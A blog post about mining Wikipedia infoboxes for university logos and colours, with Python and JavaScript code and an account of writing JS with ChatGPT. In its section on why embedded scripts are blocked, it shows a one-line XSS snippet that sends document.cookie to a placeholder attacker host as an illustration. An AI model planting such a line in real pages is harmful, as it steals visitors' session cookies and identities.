Datamining Wikipedia and writing JS with ChatGPT just to swap the colours on university logos…

I am not sure the University of Oxford logo works in the gold from the University of Otago…

A few months back I moved from the Oxford BRC to OPIG, both within the University of Oxford, but like many in academia I have moved across a few universities. As this is my first post here I wanted to do something neat: a JS tool that swaps the colours in university logos!
It was a rather laborious task requiring a lot of coding, but once I got it working I tripped up at the last metre. So for technical reasons I have resorted to hosting it on my own blog (see post), but the path towards it is nevertheless worth discussing.

Requirements

In order to make a logo of a university with the colours of another, the following are required:

  1. Determine whether JavaScript content can be embedded in the target post
  2. Find or create a dataset of the logo and the official colours for most universities
  3. Write JS code that matches user input to a university name in that dataset, fetches the logo from the stored address, and lets the user choose which colours to replace with which

Embedding JavaScript

I failed at my groundwork for this point. My blog is a Blogger site ("for now", I have been telling myself for the last decade), which does allow script elements in the HTML. Having never posted on a WordPress blog, I did a quick Google search and there seemed to be plenty of ways to embed JavaScript, but I did not check whether those instructions were still current, and they weren't: I should have started with a simple test, just <script>alert('hello world')</script>.
The troubles of actually writing JavaScript aside (which I will cover in my third point), embedding JavaScript is often disallowed outright. In GitHub markdown, for example, you can happily add certain HTML elements, but not the script element, nor onclick and the other inline event-listener attributes, nor even the style tag for inline CSS. In my webapp Michelanglo I implemented the same restriction with the Python library bleach. The reason is that embedded scripts would allow cross-site scripting (XSS) theft of information such as cookies: when one logs into a site, the password is hashed and compared to a stored hash (plain-text password storage is a big no-no) and the browser is given a cookie, which is sent in the header of all subsequent requests so the username and password do not have to be resent each time; were that cookie intercepted (assuming no SSL layer, the s in https) or stolen via XSS, one's identity would be stolen with it. So, given the multiuser nature of this blog, I am in a way glad that JS embedding is disabled here.
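To illustrate the point (purely a sketch: attacker.example is a made-up address), an injected script needs only one line to exfiltrate a visitor's cookie:

// hypothetical injected snippet: if script tags were allowed, a cookie could be shipped to a third party
fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie));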

Hosting parenthesis

In terms of GitHub, GitHub Pages lets one serve whatever content one wants, scripts included, so that is the recommended way. Truth be told, I disagree with the idea that free external hosting solutions are the best. They are definitely better than paid solutions, which get expensive as the years pile on, but they are not overly permanent and not worth the faff of having to move frequently. Two decades ago everyone was making GeoCities pages, until it got shut down due to the proliferation of disgusting and illegal content. Then a decade ago one could serve HTML pages and other files from Dropbox and a few other sites, but this ran into the same issue. Half a decade ago GitHub also stopped serving its raw HTML as HTML, and then stopped serving JS with cross-origin headers (as CDNs do); a few years later RawGit, its fill-in replacement, also kicked the bucket, in that case because of Bitcoin miners. For a webapp in Python (a D&D encounter simulator) I was using the free tier of OpenShift Online, but I had to flee in 2017 when they changed the T&Cs and throttled its usability. I moved to hosting webapps and the like at home, first on a Raspberry Pi 3 and then on a £100 Intel NUC. Even if this is not viable for work projects and the sys-admin side had a sharp firefighting-driven learning curve, I am very pleased with it and have a dozen wee web apps running on it. I should say this is not a common viewpoint, just my personal experience.

Wikipedia datamining

I am a big fan of using Wikipedia for soft data. Specifically, wikimarkup has code blocks called templates, which present information in a consistent way thanks to set fields. In particular there are infoboxes, the summary boxes that appear on the right-hand side of articles on Latin-alphabet Wikipedia sites; for articles about universities, the Infobox_university template is used (a trimmed example is sketched below). I have previously datamined Wikipedia for all sorts of things (cf. code used). A nice extra is the page-view data, which tells you how popular an article is; since articles are clustered by category, I have used this to make silly figures such as the most popular stars, places on Mars, dinosaurs and planes.
The data is, however, dirty, so it does require some polishing.
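For orientation, the wikitext of such an infobox looks roughly like this (values are illustrative and most fields are omitted; note the nested colour templates, which will matter later):

{{Infobox university
| name       = University of Examples
| image_name = University_of_Examples_logo.svg
| colours    = Navy blue & gold {{color box|#002147}} {{color box|#FFD700}}
}}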

Mining

For a small subset of a few hundred pages one can simply download all the pages from that category. For this project, where there are five thousand articles about universities, I used the downloaded English Wikipedia XML dump.
Specifically, for the former approach I have previously used a small class I wrote to iteratively find all the pages with infoboxes and get the data from them.

from wiki_category_analyser import WikicatParser
pages = WikicatParser(category='Category:Articles_using_infobox_university',
                      wanted_templates=['Infobox_university'])
pages.get_pages_recursively()
print(pages.data)
table = pages.to_dataframe()

This approach does not work well with large datasets, as it takes forever. I am not overly keen on downloading multi-GB files for once-in-a-while curiosities, but in this case downloading English Wikipedia is easier. And yes, without figures, revisions or other metadata, English Wikipedia is only about 20 GB in compressed form, which is creepily small.

import mwxml, bz2

dump = mwxml.Dump.from_file(bz2.open('dumps/enwiki-latest-pages-articles.xml.bz2',
                                     mode='rt', encoding='utf-8')
                           )
print(dump.site_info.name)  # Wikipedia
print(dump.site_info.dbname)  # enwiki

for page in dump:
    revision = next(page)
    ...

However, my first attempt using my parser, which is built on wikitextparser, could not deal with nested templates, most likely because that dependency is regex-based rather than a proper tree parser (cf. the famous comedic Stack Overflow answer on parsing XML with regex), so weird hacks were required.

wp = WikicatParser('', wanted_templates='Infobox university')

import re, functools
import pickle, gzip

def remove_cat(text, category):
    """
    A poor hack to circumvent nested templates
    """
    return re.sub(r'\{\{'+category+r'[^{}]*\}\}', '', text)

data = []

for page in dump:
    revision = next(page)
    if revision.text is None:
        continue
    if 'Infobox university' not in revision.text:
        continue
    text = revision.text.replace('\n','').replace('{{!}}', '')
    cleaned_text = functools.reduce(remove_cat, ['Cite', 'cite', 'Efn'], text)
    info = wp.parse_templates(cleaned_text)  # parse the de-nested text, not the raw revision
    if 'name' not in info:
        continue
    data.append({'name': info['name'], 
                 'image_name': info.get('image_name', None),
                 'colors': info.get('colors', info.get('colours', None) )
                })

with gzip.open('unicolors.pkl.gz', 'wb') as fh:
    pickle.dump(data, fh)
len(data)

However, storing the whole of info reveals further issues:
US universities have colors, British ones colours, while Spanish universities have the field colores. Then again, I comment in BE but name my variables in AE, so I cannot really complain.

from typing import List, Dict, TypedDict
import pandas as pd
import pandera.typing as pdt

data: pd.DataFrame = pd.DataFrame(pd.read_pickle('unicolors.pkl.gz'))  # the list of dicts saved above
na2list = lambda v: v if isinstance(v, list) else []
data['hex']: pdt.Series[str] = data.colors.str.findall(r'(#\w+)').apply(na2list) + \
                               data.colours.str.findall(r'(#\w+)').apply(na2list)
data['name']: pdt.Series[str] = data['name'].str.replace(r'\{\{lang\|.*?\|(.*?)\}\}', r'\1', regex=True)\
                                            .str.replace('\'\'\'','', regex=False).fillna('').str.strip()

import re

def get_image(row: pd.Series):
    for entry in (row.logo, row.image, row.image_name):
        if isinstance(entry, str) and entry.strip():
            cleaned:str = entry.replace('File:', '').strip()
            return re.sub(r'[\[\]]', '', cleaned)
    return ''

data['image_name']: pdt.Series[str] = data.apply(get_image, axis=1)
data = data.loc[data['name'] != '']

import json


#d = data.loc[data.image_name.str.contains('.svg')].set_index('name').image_name.to_dict()
json_data = json.dumps(data[['name', 'image_name', 'hex']]\
                       .rename(columns={'hex': 'colors'})\
                       .to_dict(orient='records'))

with open('../wiki-university-colours/universities.json', 'w') as fh:
    fh.write(json_data)

Done! Before moving on, I should point out that in the above I typehint my pandas with pandera.typing: if you are unfamiliar with it, do check it out, as it removes the pain of revisiting code, especially for rushed data analyses.

JS writing in a JupyterLab notebook

I normally write Python for data exploration or functionality testing in a notebook, so I gave it a go with JS.
It should be said that Colab notebook outputs run in embedded sandboxes, a sandpit basically, so nothing can get out of them, whereas here I am talking about JupyterLab notebooks, or even þe olde plain Jupyter notebooks.
In a regular notebook, the output area HTMLElement is available as element, and anything attached to window will be visible everywhere.
Go main namespace pollution!
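As a minimal sketch of those two globals (the name shared_value is mine), a %%javascript cell can do:

%%javascript
// element is this cell's output area; window is the page-wide global object
element.textContent = 'hello from this cell';
window.shared_value = 42;  // visible from any later cell or the browser console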

from IPython.display import display, HTML

import json

json_data = json.dumps(data[['name', 'image_name', 'hex']]\
                       .rename(columns={'hex': 'colors'})\
                       .to_dict(orient='records'))

display(HTML(f'<script>window.universities={json_data};</script>'))

with open('university-code.js') as fh:
    js_block = fh.read()
display(HTML(f'<script type="module" id="university-code">{js_block}</script>'))

This means that if I have a cell with the cell magic %%javascript I can do:

import { University, UniCombineColor } from './university-code.js';
new UniCombineColor(element);

I actually wrote the JS in a large cell and did not do the module approach until the end.

I can code in Python and JS, but I struggle to manage both at the same time and it takes me a while to get back into the other. This is both vocabulary and grammar: for example, len(foo) in Python is foo.length in JS, and in Python list comprehensions ([v+1 for v in foo]) are more common than the map function (tuple(map(lambda v: v+1, foo)), or worse (*map(functools.partial(operator.add, 1), foo),)), whereas in JS the latter form, foo.map(v => v+1), is the idiom. Crucially, I can read both fine. As a result I gave a new tactic a go: getting ChatGPT to write my code, following my corrections.
I asked the robot things I could have easily googled, e.g. “What are the options for event listeners for an input box of type text?”, but also to write small snippets, giving it explicit variable names and repeating the term vanilla JS. The latter requests were very constructive. Asking it to write larger snippets was more problematic, however, as it kept needing corrections; for example, these are an actual series of consecutive requests (a sketch of where they ended up follows the list):

  • Could you write a vanilla JS snippet that given an input box with id uni_input and a div, that when there is a change in the input box it adds to the div a series of buttons (max 10) with a value from an array which contains the value of the input box
  • I meant that an array is provided (called university_names), which is filtered to find matches with the value of the input box and show these (max 10)
  • Could you tweak it to use arrow functions?
  • change the JS variable from input to text_input
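For reference, here is a rough sketch of what those requests converge on (uni_input, text_input and university_names come from the prompts; the container id suggestion_div is my own):

// vanilla JS: on input, filter university_names and show up to ten matches as buttons
const text_input = document.getElementById('uni_input');
const suggestion_div = document.getElementById('suggestion_div');  // hypothetical id for the target div
text_input.addEventListener('input', () => {
    suggestion_div.innerHTML = '';  // clear previous suggestions
    const query = text_input.value.toLowerCase();
    university_names
        .filter(name => name.toLowerCase().includes(query))
        .slice(0, 10)
        .forEach(name => {
            const button = document.createElement('button');
            button.textContent = name;
            suggestion_div.appendChild(button);
        });
});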

Due to length limits, ChatGPT requests on large code blocks, such as adding JSDocs, were cut short, and towards the end I wrote without it, for instance when refactoring the snippets into a class and making other changes.
However, in terms of getting started it was very constructive as I was rusty on JS.

In terms of writing JS in a notebook, I won’t lie, it wasn’t great. It is obviously less of a faff than working with a monolithic webapp project in PyCharm or writing code in the console, but it was not pleasant. It was potentially no better than writing an HTML or JS file in PyCharm and checking it by pressing shift-F5 continually.

The code highlighting was off-whack, as // was not seen as a comment while # was. In fact, in the code I could not write /#[0-9A-Z]{6}/gi because the highlighter saw it as though the expression were unterminated, so I had to new RegExp it, which is sad.
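That workaround, for the record, is just a one-liner (hexPattern is my own name for it):

// the same pattern as the literal /#[0-9A-Z]{6}/gi, built from a string so the highlighter stays happy
const hexPattern = new RegExp('#[0-9A-Z]{6}', 'gi');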
The second issue I encountered was that Tabnine, a less powerful Copilot alternative that works in notebooks, kept entering infinite loops, whereas had I used PyCharm I would have had the help of Copilot. One can run notebooks in PyCharm (it just takes an annoying minute or two to get right), so next time I will do that, aided by ChatGPT for the simple things.
